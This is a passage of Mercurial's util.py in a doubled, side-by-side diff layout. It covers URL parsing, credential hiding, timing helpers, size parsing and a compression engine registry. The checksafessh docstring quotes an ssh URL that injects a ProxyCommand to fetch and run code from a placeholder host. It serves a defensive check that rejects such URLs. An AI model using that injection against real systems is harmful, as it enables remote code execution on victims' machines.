2778 if ':' in self.user:
2781 self.user, self.passwd = self.user.split(':', 1)
2779 self.user, self.passwd = self.user.split(':', 1)
2782 if not self.host:
2780 if not self.host:
2783 self.host = None
2781 self.host = None
2784
2782
2785 # Don't split on colons in IPv6 addresses without ports
2783 # Don't split on colons in IPv6 addresses without ports
2786 if (self.host and ':' in self.host and
2784 if (self.host and ':' in self.host and
2787 not (self.host.startswith('[') and self.host.endswith(']'))):
2785 not (self.host.startswith('[') and self.host.endswith(']'))):
2788 self._hostport = self.host
2786 self._hostport = self.host
2789 self.host, self.port = self.host.rsplit(':', 1)
2787 self.host, self.port = self.host.rsplit(':', 1)
2790 if not self.host:
2788 if not self.host:
2791 self.host = None
2789 self.host = None
2792
2790
2793 if (self.host and self.scheme == 'file' and
2791 if (self.host and self.scheme == 'file' and
2794 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2792 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2795 raise error.Abort(_('file:// URLs can only refer to localhost'))
2793 raise error.Abort(_('file:// URLs can only refer to localhost'))
2796
2794
2797 self.path = path
2795 self.path = path
2798
2796
2799 # leave the query string escaped
2797 # leave the query string escaped
2800 for a in ('user', 'passwd', 'host', 'port',
2798 for a in ('user', 'passwd', 'host', 'port',
2801 'path', 'fragment'):
2799 'path', 'fragment'):
2802 v = getattr(self, a)
2800 v = getattr(self, a)
2803 if v is not None:
2801 if v is not None:
2804 setattr(self, a, urlreq.unquote(v))
2802 setattr(self, a, urlreq.unquote(v))
2805
2803
2806 @encoding.strmethod
2804 @encoding.strmethod
2807 def __repr__(self):
2805 def __repr__(self):
2808 attrs = []
2806 attrs = []
2809 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2810 'query', 'fragment'):
2808 'query', 'fragment'):
2811 v = getattr(self, a)
2809 v = getattr(self, a)
2812 if v is not None:
2810 if v is not None:
2813 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2811 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2814 return '<url %s>' % ', '.join(attrs)
2812 return '<url %s>' % ', '.join(attrs)
2815
2813
2816 def __bytes__(self):
2814 def __bytes__(self):
2817 r"""Join the URL's components back into a URL string.
2815 r"""Join the URL's components back into a URL string.
2818
2816
2819 Examples:
2817 Examples:
2820
2818
2821 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2819 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2822 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2823 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2821 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2824 'http://user:pw@host:80/?foo=bar&baz=42'
2822 'http://user:pw@host:80/?foo=bar&baz=42'
2825 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2823 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2826 'http://user:pw@host:80/?foo=bar%3dbaz'
2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2827 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2825 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2828 'ssh://user:pw@[::1]:2200//home/joe#'
2826 'ssh://user:pw@[::1]:2200//home/joe#'
2829 >>> bytes(url(b'http://localhost:80//'))
2827 >>> bytes(url(b'http://localhost:80//'))
2830 'http://localhost:80//'
2828 'http://localhost:80//'
2831 >>> bytes(url(b'http://localhost:80/'))
2829 >>> bytes(url(b'http://localhost:80/'))
2832 'http://localhost:80/'
2830 'http://localhost:80/'
2833 >>> bytes(url(b'http://localhost:80'))
2831 >>> bytes(url(b'http://localhost:80'))
2834 'http://localhost:80/'
2832 'http://localhost:80/'
2835 >>> bytes(url(b'bundle:foo'))
2833 >>> bytes(url(b'bundle:foo'))
2836 'bundle:foo'
2834 'bundle:foo'
2837 >>> bytes(url(b'bundle://../foo'))
2835 >>> bytes(url(b'bundle://../foo'))
2838 'bundle:../foo'
2836 'bundle:../foo'
2839 >>> bytes(url(b'path'))
2837 >>> bytes(url(b'path'))
2840 'path'
2838 'path'
2841 >>> bytes(url(b'file:///tmp/foo/bar'))
2839 >>> bytes(url(b'file:///tmp/foo/bar'))
2842 'file:///tmp/foo/bar'
2840 'file:///tmp/foo/bar'
2843 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2841 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2844 'file:///c:/tmp/foo/bar'
2842 'file:///c:/tmp/foo/bar'
2845 >>> print(url(br'bundle:foo\bar'))
2843 >>> print(url(br'bundle:foo\bar'))
2846 bundle:foo\bar
2844 bundle:foo\bar
2847 >>> print(url(br'file:///D:\data\hg'))
2845 >>> print(url(br'file:///D:\data\hg'))
2848 file:///D:\data\hg
2846 file:///D:\data\hg
2849 """
2847 """
2850 if self._localpath:
2848 if self._localpath:
2851 s = self.path
2849 s = self.path
2852 if self.scheme == 'bundle':
2850 if self.scheme == 'bundle':
2853 s = 'bundle:' + s
2851 s = 'bundle:' + s
2854 if self.fragment:
2852 if self.fragment:
2855 s += '#' + self.fragment
2853 s += '#' + self.fragment
2856 return s
2854 return s
2857
2855
2858 s = self.scheme + ':'
2856 s = self.scheme + ':'
2859 if self.user or self.passwd or self.host:
2857 if self.user or self.passwd or self.host:
2860 s += '//'
2858 s += '//'
2861 elif self.scheme and (not self.path or self.path.startswith('/')
2859 elif self.scheme and (not self.path or self.path.startswith('/')
2862 or hasdriveletter(self.path)):
2860 or hasdriveletter(self.path)):
2863 s += '//'
2861 s += '//'
2864 if hasdriveletter(self.path):
2862 if hasdriveletter(self.path):
2865 s += '/'
2863 s += '/'
2866 if self.user:
2864 if self.user:
2867 s += urlreq.quote(self.user, safe=self._safechars)
2865 s += urlreq.quote(self.user, safe=self._safechars)
2868 if self.passwd:
2866 if self.passwd:
2869 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2870 if self.user or self.passwd:
2868 if self.user or self.passwd:
2871 s += '@'
2869 s += '@'
2872 if self.host:
2870 if self.host:
2873 if not (self.host.startswith('[') and self.host.endswith(']')):
2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2874 s += urlreq.quote(self.host)
2872 s += urlreq.quote(self.host)
2875 else:
2873 else:
2876 s += self.host
2874 s += self.host
2877 if self.port:
2875 if self.port:
2878 s += ':' + urlreq.quote(self.port)
2876 s += ':' + urlreq.quote(self.port)
2879 if self.host:
2877 if self.host:
2880 s += '/'
2878 s += '/'
2881 if self.path:
2879 if self.path:
2882 # TODO: similar to the query string, we should not unescape the
2880 # TODO: similar to the query string, we should not unescape the
2883 # path when we store it, the path might contain '%2f' = '/',
2881 # path when we store it, the path might contain '%2f' = '/',
2884 # which we should *not* escape.
2882 # which we should *not* escape.
2885 s += urlreq.quote(self.path, safe=self._safepchars)
2883 s += urlreq.quote(self.path, safe=self._safepchars)
2886 if self.query:
2884 if self.query:
2887 # we store the query in escaped form.
2885 # we store the query in escaped form.
2888 s += '?' + self.query
2886 s += '?' + self.query
2889 if self.fragment is not None:
2887 if self.fragment is not None:
2890 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2891 return s
2889 return s
2892
2890
2893 __str__ = encoding.strmethod(__bytes__)
2891 __str__ = encoding.strmethod(__bytes__)
2894
2892
2895 def authinfo(self):
2893 def authinfo(self):
2896 user, passwd = self.user, self.passwd
2894 user, passwd = self.user, self.passwd
2897 try:
2895 try:
2898 self.user, self.passwd = None, None
2896 self.user, self.passwd = None, None
2899 s = bytes(self)
2897 s = bytes(self)
2900 finally:
2898 finally:
2901 self.user, self.passwd = user, passwd
2899 self.user, self.passwd = user, passwd
2902 if not self.user:
2900 if not self.user:
2903 return (s, None)
2901 return (s, None)
2904 # authinfo[1] is passed to urllib2 password manager, and its
2902 # authinfo[1] is passed to urllib2 password manager, and its
2905 # URIs must not contain credentials. The host is passed in the
2903 # URIs must not contain credentials. The host is passed in the
2906 # URIs list because Python < 2.4.3 uses only that to search for
2904 # URIs list because Python < 2.4.3 uses only that to search for
2907 # a password.
2905 # a password.
2908 return (s, (None, (s, self.host),
2906 return (s, (None, (s, self.host),
2909 self.user, self.passwd or ''))
2907 self.user, self.passwd or ''))
2910
2908
2911 def isabs(self):
2909 def isabs(self):
2912 if self.scheme and self.scheme != 'file':
2910 if self.scheme and self.scheme != 'file':
2913 return True # remote URL
2911 return True # remote URL
2914 if hasdriveletter(self.path):
2912 if hasdriveletter(self.path):
2915 return True # absolute for our purposes - can't be joined()
2913 return True # absolute for our purposes - can't be joined()
2916 if self.path.startswith(br'\\'):
2914 if self.path.startswith(br'\\'):
2917 return True # Windows UNC path
2915 return True # Windows UNC path
2918 if self.path.startswith('/'):
2916 if self.path.startswith('/'):
2919 return True # POSIX-style
2917 return True # POSIX-style
2920 return False
2918 return False
2921
2919
2922 def localpath(self):
2920 def localpath(self):
2923 if self.scheme == 'file' or self.scheme == 'bundle':
2921 if self.scheme == 'file' or self.scheme == 'bundle':
2924 path = self.path or '/'
2922 path = self.path or '/'
2925 # For Windows, we need to promote hosts containing drive
2923 # For Windows, we need to promote hosts containing drive
2926 # letters to paths with drive letters.
2924 # letters to paths with drive letters.
2927 if hasdriveletter(self._hostport):
2925 if hasdriveletter(self._hostport):
2928 path = self._hostport + '/' + self.path
2926 path = self._hostport + '/' + self.path
2929 elif (self.host is not None and self.path
2927 elif (self.host is not None and self.path
2930 and not hasdriveletter(path)):
2928 and not hasdriveletter(path)):
2931 path = '/' + path
2929 path = '/' + path
2932 return path
2930 return path
2933 return self._origpath
2931 return self._origpath
2934
2932
2935 def islocal(self):
2933 def islocal(self):
2936 '''whether localpath will return something that posixfile can open'''
2934 '''whether localpath will return something that posixfile can open'''
2937 return (not self.scheme or self.scheme == 'file'
2935 return (not self.scheme or self.scheme == 'file'
2938 or self.scheme == 'bundle')
2936 or self.scheme == 'bundle')
2939
2937
2940 def hasscheme(path):
2938 def hasscheme(path):
2941 return bool(url(path).scheme)
2939 return bool(url(path).scheme)
2942
2940
2943 def hasdriveletter(path):
2941 def hasdriveletter(path):
2944 return path and path[1:2] == ':' and path[0:1].isalpha()
2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2945
2943
2946 def urllocalpath(path):
2944 def urllocalpath(path):
2947 return url(path, parsequery=False, parsefragment=False).localpath()
2945 return url(path, parsequery=False, parsefragment=False).localpath()
2948
2946
2949 def checksafessh(path):
2947 def checksafessh(path):
2950 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2951
2949
2952 This is a sanity check for ssh urls. ssh will parse the first item as
2950 This is a sanity check for ssh urls. ssh will parse the first item as
2953 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2954 Let's prevent these potentially exploited urls entirely and warn the
2952 Let's prevent these potentially exploited urls entirely and warn the
2955 user.
2953 user.
2956
2954
2957 Raises an error.Abort when the url is unsafe.
2955 Raises an error.Abort when the url is unsafe.
2958 """
2956 """
2959 path = urlreq.unquote(path)
2957 path = urlreq.unquote(path)
2960 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2961 raise error.Abort(_('potentially unsafe url: %r') %
2959 raise error.Abort(_('potentially unsafe url: %r') %
2962 (pycompat.bytestr(path),))
2960 (pycompat.bytestr(path),))
2963
2961
2964 def hidepassword(u):
2962 def hidepassword(u):
2965 '''hide user credential in a url string'''
2963 '''hide user credential in a url string'''
2966 u = url(u)
2964 u = url(u)
2967 if u.passwd:
2965 if u.passwd:
2968 u.passwd = '***'
2966 u.passwd = '***'
2969 return bytes(u)
2967 return bytes(u)
2970
2968
2971 def removeauth(u):
2969 def removeauth(u):
2972 '''remove all authentication information from a url string'''
2970 '''remove all authentication information from a url string'''
2973 u = url(u)
2971 u = url(u)
2974 u.user = u.passwd = None
2972 u.user = u.passwd = None
2975 return bytes(u)
2973 return bytes(u)
2976
2974
2977 timecount = unitcountfn(
2975 timecount = unitcountfn(
2978 (1, 1e3, _('%.0f s')),
2976 (1, 1e3, _('%.0f s')),
2979 (100, 1, _('%.1f s')),
2977 (100, 1, _('%.1f s')),
2980 (10, 1, _('%.2f s')),
2978 (10, 1, _('%.2f s')),
2981 (1, 1, _('%.3f s')),
2979 (1, 1, _('%.3f s')),
2982 (100, 0.001, _('%.1f ms')),
2980 (100, 0.001, _('%.1f ms')),
2983 (10, 0.001, _('%.2f ms')),
2981 (10, 0.001, _('%.2f ms')),
2984 (1, 0.001, _('%.3f ms')),
2982 (1, 0.001, _('%.3f ms')),
2985 (100, 0.000001, _('%.1f us')),
2983 (100, 0.000001, _('%.1f us')),
2986 (10, 0.000001, _('%.2f us')),
2984 (10, 0.000001, _('%.2f us')),
2987 (1, 0.000001, _('%.3f us')),
2985 (1, 0.000001, _('%.3f us')),
2988 (100, 0.000000001, _('%.1f ns')),
2986 (100, 0.000000001, _('%.1f ns')),
2989 (10, 0.000000001, _('%.2f ns')),
2987 (10, 0.000000001, _('%.2f ns')),
2990 (1, 0.000000001, _('%.3f ns')),
2988 (1, 0.000000001, _('%.3f ns')),
2991 )
2989 )
2992
2990
2993 @attr.s
2991 @attr.s
2994 class timedcmstats(object):
2992 class timedcmstats(object):
2995 """Stats information produced by the timedcm context manager on entering."""
2993 """Stats information produced by the timedcm context manager on entering."""
2996
2994
2997 # the starting value of the timer as a float (meaning and resulution is
2995 # the starting value of the timer as a float (meaning and resulution is
2998 # platform dependent, see util.timer)
2996 # platform dependent, see util.timer)
2999 start = attr.ib(default=attr.Factory(lambda: timer()))
2997 start = attr.ib(default=attr.Factory(lambda: timer()))
3000 # the number of seconds as a floating point value; starts at 0, updated when
2998 # the number of seconds as a floating point value; starts at 0, updated when
3001 # the context is exited.
2999 # the context is exited.
3002 elapsed = attr.ib(default=0)
3000 elapsed = attr.ib(default=0)
3003 # the number of nested timedcm context managers.
3001 # the number of nested timedcm context managers.
3004 level = attr.ib(default=1)
3002 level = attr.ib(default=1)
3005
3003
3006 def __bytes__(self):
3004 def __bytes__(self):
3007 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3005 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3008
3006
3009 __str__ = encoding.strmethod(__bytes__)
3007 __str__ = encoding.strmethod(__bytes__)
3010
3008
3011 @contextlib.contextmanager
3009 @contextlib.contextmanager
3012 def timedcm(whencefmt, *whenceargs):
3010 def timedcm(whencefmt, *whenceargs):
3013 """A context manager that produces timing information for a given context.
3011 """A context manager that produces timing information for a given context.
3014
3012
3015 On entering a timedcmstats instance is produced.
3013 On entering a timedcmstats instance is produced.
3016
3014
3017 This context manager is reentrant.
3015 This context manager is reentrant.
3018
3016
3019 """
3017 """
3020 # track nested context managers
3018 # track nested context managers
3021 timedcm._nested += 1
3019 timedcm._nested += 1
3022 timing_stats = timedcmstats(level=timedcm._nested)
3020 timing_stats = timedcmstats(level=timedcm._nested)
3023 try:
3021 try:
3024 with tracing.log(whencefmt, *whenceargs):
3022 with tracing.log(whencefmt, *whenceargs):
3025 yield timing_stats
3023 yield timing_stats
3026 finally:
3024 finally:
3027 timing_stats.elapsed = timer() - timing_stats.start
3025 timing_stats.elapsed = timer() - timing_stats.start
3028 timedcm._nested -= 1
3026 timedcm._nested -= 1
3029
3027
3030 timedcm._nested = 0
3028 timedcm._nested = 0
3031
3029
3032 def timed(func):
3030 def timed(func):
3033 '''Report the execution time of a function call to stderr.
3031 '''Report the execution time of a function call to stderr.
3034
3032
3035 During development, use as a decorator when you need to measure
3033 During development, use as a decorator when you need to measure
3036 the cost of a function, e.g. as follows:
3034 the cost of a function, e.g. as follows:
3037
3035
3038 @util.timed
3036 @util.timed
3039 def foo(a, b, c):
3037 def foo(a, b, c):
3040 pass
3038 pass
3041 '''
3039 '''
3042
3040
3043 def wrapper(*args, **kwargs):
3041 def wrapper(*args, **kwargs):
3044 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3042 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3045 result = func(*args, **kwargs)
3043 result = func(*args, **kwargs)
3046 stderr = procutil.stderr
3044 stderr = procutil.stderr
3047 stderr.write('%s%s: %s\n' % (
3045 stderr.write('%s%s: %s\n' % (
3048 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3046 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3049 time_stats))
3047 time_stats))
3050 return result
3048 return result
3051 return wrapper
3049 return wrapper
3052
3050
3053 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3051 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3054 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3052 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3055
3053
3056 def sizetoint(s):
3054 def sizetoint(s):
3057 '''Convert a space specifier to a byte count.
3055 '''Convert a space specifier to a byte count.
3058
3056
3059 >>> sizetoint(b'30')
3057 >>> sizetoint(b'30')
3060 30
3058 30
3061 >>> sizetoint(b'2.2kb')
3059 >>> sizetoint(b'2.2kb')
3062 2252
3060 2252
3063 >>> sizetoint(b'6M')
3061 >>> sizetoint(b'6M')
3064 6291456
3062 6291456
3065 '''
3063 '''
3066 t = s.strip().lower()
3064 t = s.strip().lower()
3067 try:
3065 try:
3068 for k, u in _sizeunits:
3066 for k, u in _sizeunits:
3069 if t.endswith(k):
3067 if t.endswith(k):
3070 return int(float(t[:-len(k)]) * u)
3068 return int(float(t[:-len(k)]) * u)
3071 return int(t)
3069 return int(t)
3072 except ValueError:
3070 except ValueError:
3073 raise error.ParseError(_("couldn't parse size: %s") % s)
3071 raise error.ParseError(_("couldn't parse size: %s") % s)
3074
3072
3075 class hooks(object):
3073 class hooks(object):
3076 '''A collection of hook functions that can be used to extend a
3074 '''A collection of hook functions that can be used to extend a
3077 function's behavior. Hooks are called in lexicographic order,
3075 function's behavior. Hooks are called in lexicographic order,
3078 based on the names of their sources.'''
3076 based on the names of their sources.'''
3079
3077
3080 def __init__(self):
3078 def __init__(self):
3081 self._hooks = []
3079 self._hooks = []
3082
3080
3083 def add(self, source, hook):
3081 def add(self, source, hook):
3084 self._hooks.append((source, hook))
3082 self._hooks.append((source, hook))
3085
3083
3086 def __call__(self, *args):
3084 def __call__(self, *args):
3087 self._hooks.sort(key=lambda x: x[0])
3085 self._hooks.sort(key=lambda x: x[0])
3088 results = []
3086 results = []
3089 for source, hook in self._hooks:
3087 for source, hook in self._hooks:
3090 results.append(hook(*args))
3088 results.append(hook(*args))
3091 return results
3089 return results
3092
3090
3093 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3091 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3094 '''Yields lines for a nicely formatted stacktrace.
3092 '''Yields lines for a nicely formatted stacktrace.
3095 Skips the 'skip' last entries, then return the last 'depth' entries.
3093 Skips the 'skip' last entries, then return the last 'depth' entries.
3096 Each file+linenumber is formatted according to fileline.
3094 Each file+linenumber is formatted according to fileline.
3097 Each line is formatted according to line.
3095 Each line is formatted according to line.
3098 If line is None, it yields:
3096 If line is None, it yields:
3099 length of longest filepath+line number,
3097 length of longest filepath+line number,
3100 filepath+linenumber,
3098 filepath+linenumber,
3101 function
3099 function
3102
3100
3103 Not be used in production code but very convenient while developing.
3101 Not be used in production code but very convenient while developing.
3104 '''
3102 '''
3105 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3103 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3106 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3104 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3107 ][-depth:]
3105 ][-depth:]
3108 if entries:
3106 if entries:
3109 fnmax = max(len(entry[0]) for entry in entries)
3107 fnmax = max(len(entry[0]) for entry in entries)
3110 for fnln, func in entries:
3108 for fnln, func in entries:
3111 if line is None:
3109 if line is None:
3112 yield (fnmax, fnln, func)
3110 yield (fnmax, fnln, func)
3113 else:
3111 else:
3114 yield line % (fnmax, fnln, func)
3112 yield line % (fnmax, fnln, func)
3115
3113
3116 def debugstacktrace(msg='stacktrace', skip=0,
3114 def debugstacktrace(msg='stacktrace', skip=0,
3117 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3115 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3118 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3116 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3119 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3117 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3120 By default it will flush stdout first.
3118 By default it will flush stdout first.
3121 It can be used everywhere and intentionally does not require an ui object.
3119 It can be used everywhere and intentionally does not require an ui object.
3122 Not be used in production code but very convenient while developing.
3120 Not be used in production code but very convenient while developing.
3123 '''
3121 '''
3124 if otherf:
3122 if otherf:
3125 otherf.flush()
3123 otherf.flush()
3126 f.write('%s at:\n' % msg.rstrip())
3124 f.write('%s at:\n' % msg.rstrip())
3127 for line in getstackframes(skip + 1, depth=depth):
3125 for line in getstackframes(skip + 1, depth=depth):
3128 f.write(line)
3126 f.write(line)
3129 f.flush()
3127 f.flush()
3130
3128
3131 class dirs(object):
3129 class dirs(object):
3132 '''a multiset of directory names from a dirstate or manifest'''
3130 '''a multiset of directory names from a dirstate or manifest'''
3133
3131
3134 def __init__(self, map, skip=None):
3132 def __init__(self, map, skip=None):
3135 self._dirs = {}
3133 self._dirs = {}
3136 addpath = self.addpath
3134 addpath = self.addpath
3137 if safehasattr(map, 'iteritems') and skip is not None:
3135 if safehasattr(map, 'iteritems') and skip is not None:
3138 for f, s in map.iteritems():
3136 for f, s in map.iteritems():
3139 if s[0] != skip:
3137 if s[0] != skip:
3140 addpath(f)
3138 addpath(f)
3141 else:
3139 else:
3142 for f in map:
3140 for f in map:
3143 addpath(f)
3141 addpath(f)
3144
3142
3145 def addpath(self, path):
3143 def addpath(self, path):
3146 dirs = self._dirs
3144 dirs = self._dirs
3147 for base in finddirs(path):
3145 for base in finddirs(path):
3148 if base in dirs:
3146 if base in dirs:
3149 dirs[base] += 1
3147 dirs[base] += 1
3150 return
3148 return
3151 dirs[base] = 1
3149 dirs[base] = 1
3152
3150
3153 def delpath(self, path):
3151 def delpath(self, path):
3154 dirs = self._dirs
3152 dirs = self._dirs
3155 for base in finddirs(path):
3153 for base in finddirs(path):
3156 if dirs[base] > 1:
3154 if dirs[base] > 1:
3157 dirs[base] -= 1
3155 dirs[base] -= 1
3158 return
3156 return
3159 del dirs[base]
3157 del dirs[base]
3160
3158
3161 def __iter__(self):
3159 def __iter__(self):
3162 return iter(self._dirs)
3160 return iter(self._dirs)
3163
3161
3164 def __contains__(self, d):
3162 def __contains__(self, d):
3165 return d in self._dirs
3163 return d in self._dirs
3166
3164
3167 if safehasattr(parsers, 'dirs'):
3165 if safehasattr(parsers, 'dirs'):
3168 dirs = parsers.dirs
3166 dirs = parsers.dirs
3169
3167
3170 def finddirs(path):
3168 def finddirs(path):
3171 pos = path.rfind('/')
3169 pos = path.rfind('/')
3172 while pos != -1:
3170 while pos != -1:
3173 yield path[:pos]
3171 yield path[:pos]
3174 pos = path.rfind('/', 0, pos)
3172 pos = path.rfind('/', 0, pos)
3175
3173
3176 # compression code
3174 # compression code
3177
3175
3178 SERVERROLE = 'server'
3176 SERVERROLE = 'server'
3179 CLIENTROLE = 'client'
3177 CLIENTROLE = 'client'
3180
3178
3181 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3179 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3182 (u'name', u'serverpriority',
3180 (u'name', u'serverpriority',
3183 u'clientpriority'))
3181 u'clientpriority'))
3184
3182
3185 class compressormanager(object):
3183 class compressormanager(object):
3186 """Holds registrations of various compression engines.
3184 """Holds registrations of various compression engines.
3187
3185
3188 This class essentially abstracts the differences between compression
3186 This class essentially abstracts the differences between compression
3189 engines to allow new compression formats to be added easily, possibly from
3187 engines to allow new compression formats to be added easily, possibly from
3190 extensions.
3188 extensions.
3191
3189
3192 Compressors are registered against the global instance by calling its
3190 Compressors are registered against the global instance by calling its
3193 ``register()`` method.
3191 ``register()`` method.
3194 """
3192 """
3195 def __init__(self):
3193 def __init__(self):
3196 self._engines = {}
3194 self._engines = {}
3197 # Bundle spec human name to engine name.
3195 # Bundle spec human name to engine name.
3198 self._bundlenames = {}
3196 self._bundlenames = {}
3199 # Internal bundle identifier to engine name.
3197 # Internal bundle identifier to engine name.
3200 self._bundletypes = {}
3198 self._bundletypes = {}
3201 # Revlog header to engine name.
3199 # Revlog header to engine name.
3202 self._revlogheaders = {}
3200 self._revlogheaders = {}
3203 # Wire proto identifier to engine name.
3201 # Wire proto identifier to engine name.
3204 self._wiretypes = {}
3202 self._wiretypes = {}
3205
3203
3206 def __getitem__(self, key):
3204 def __getitem__(self, key):
3207 return self._engines[key]
3205 return self._engines[key]
3208
3206
3209 def __contains__(self, key):
3207 def __contains__(self, key):
3210 return key in self._engines
3208 return key in self._engines
3211
3209
3212 def __iter__(self):
3210 def __iter__(self):
3213 return iter(self._engines.keys())
3211 return iter(self._engines.keys())
3214
3212
3215 def register(self, engine):
3213 def register(self, engine):
3216 """Register a compression engine with the manager.
3214 """Register a compression engine with the manager.
3217
3215
3218 The argument must be a ``compressionengine`` instance.
3216 The argument must be a ``compressionengine`` instance.
3219 """
3217 """
3220 if not isinstance(engine, compressionengine):
3218 if not isinstance(engine, compressionengine):
3221 raise ValueError(_('argument must be a compressionengine'))
3219 raise ValueError(_('argument must be a compressionengine'))
3222
3220
3223 name = engine.name()
3221 name = engine.name()
3224
3222
3225 if name in self._engines:
3223 if name in self._engines:
3226 raise error.Abort(_('compression engine %s already registered') %
3224 raise error.Abort(_('compression engine %s already registered') %
3227 name)
3225 name)
3228
3226
3229 bundleinfo = engine.bundletype()
3227 bundleinfo = engine.bundletype()
3230 if bundleinfo:
3228 if bundleinfo:
3231 bundlename, bundletype = bundleinfo
3229 bundlename, bundletype = bundleinfo
3232
3230
3233 if bundlename in self._bundlenames:
3231 if bundlename in self._bundlenames:
3234 raise error.Abort(_('bundle name %s already registered') %
3232 raise error.Abort(_('bundle name %s already registered') %
3235 bundlename)
3233 bundlename)
3236 if bundletype in self._bundletypes:
3234 if bundletype in self._bundletypes:
3237 raise error.Abort(_('bundle type %s already registered by %s') %
3235 raise error.Abort(_('bundle type %s already registered by %s') %
3238 (bundletype, self._bundletypes[bundletype]))
3236 (bundletype, self._bundletypes[bundletype]))
3239
3237
3240 # No external facing name declared.
3238 # No external facing name declared.
3241 if bundlename:
3239 if bundlename:
3242 self._bundlenames[bundlename] = name
3240 self._bundlenames[bundlename] = name
3243
3241
3244 self._bundletypes[bundletype] = name
3242 self._bundletypes[bundletype] = name
3245
3243
3246 wiresupport = engine.wireprotosupport()
3244 wiresupport = engine.wireprotosupport()
3247 if wiresupport:
3245 if wiresupport:
3248 wiretype = wiresupport.name
3246 wiretype = wiresupport.name
3249 if wiretype in self._wiretypes:
3247 if wiretype in self._wiretypes:
3250 raise error.Abort(_('wire protocol compression %s already '
3248 raise error.Abort(_('wire protocol compression %s already '
3251 'registered by %s') %
3249 'registered by %s') %
3252 (wiretype, self._wiretypes[wiretype]))
3250 (wiretype, self._wiretypes[wiretype]))
3253
3251
3254 self._wiretypes[wiretype] = name
3252 self._wiretypes[wiretype] = name
3255
3253
3256 revlogheader = engine.revlogheader()
3254 revlogheader = engine.revlogheader()
3257 if revlogheader and revlogheader in self._revlogheaders:
3255 if revlogheader and revlogheader in self._revlogheaders:
3258 raise error.Abort(_('revlog header %s already registered by %s') %
3256 raise error.Abort(_('revlog header %s already registered by %s') %
3259 (revlogheader, self._revlogheaders[revlogheader]))
3257 (revlogheader, self._revlogheaders[revlogheader]))
3260
3258
3261 if revlogheader:
3259 if revlogheader:
3262 self._revlogheaders[revlogheader] = name
3260 self._revlogheaders[revlogheader] = name
3263
3261
3264 self._engines[name] = engine
3262 self._engines[name] = engine
3265
3263
3266 @property
3264 @property
3267 def supportedbundlenames(self):
3265 def supportedbundlenames(self):
3268 return set(self._bundlenames.keys())
3266 return set(self._bundlenames.keys())
3269
3267
3270 @property
3268 @property
3271 def supportedbundletypes(self):
3269 def supportedbundletypes(self):
3272 return set(self._bundletypes.keys())
3270 return set(self._bundletypes.keys())
3273
3271
3274 def forbundlename(self, bundlename):
3272 def forbundlename(self, bundlename):
3275 """Obtain a compression engine registered to a bundle name.
3273 """Obtain a compression engine registered to a bundle name.
3276
3274
3277 Will raise KeyError if the bundle type isn't registered.
3275 Will raise KeyError if the bundle type isn't registered.
3278
3276
3279 Will abort if the engine is known but not available.
3277 Will abort if the engine is known but not available.
3280 """
3278 """
3281 engine = self._engines[self._bundlenames[bundlename]]
3279 engine = self._engines[self._bundlenames[bundlename]]
3282 if not engine.available():
3280 if not engine.available():
3283 raise error.Abort(_('compression engine %s could not be loaded') %
3281 raise error.Abort(_('compression engine %s could not be loaded') %
3284 engine.name())
3282 engine.name())
3285 return engine
3283 return engine
3286
3284
3287 def forbundletype(self, bundletype):
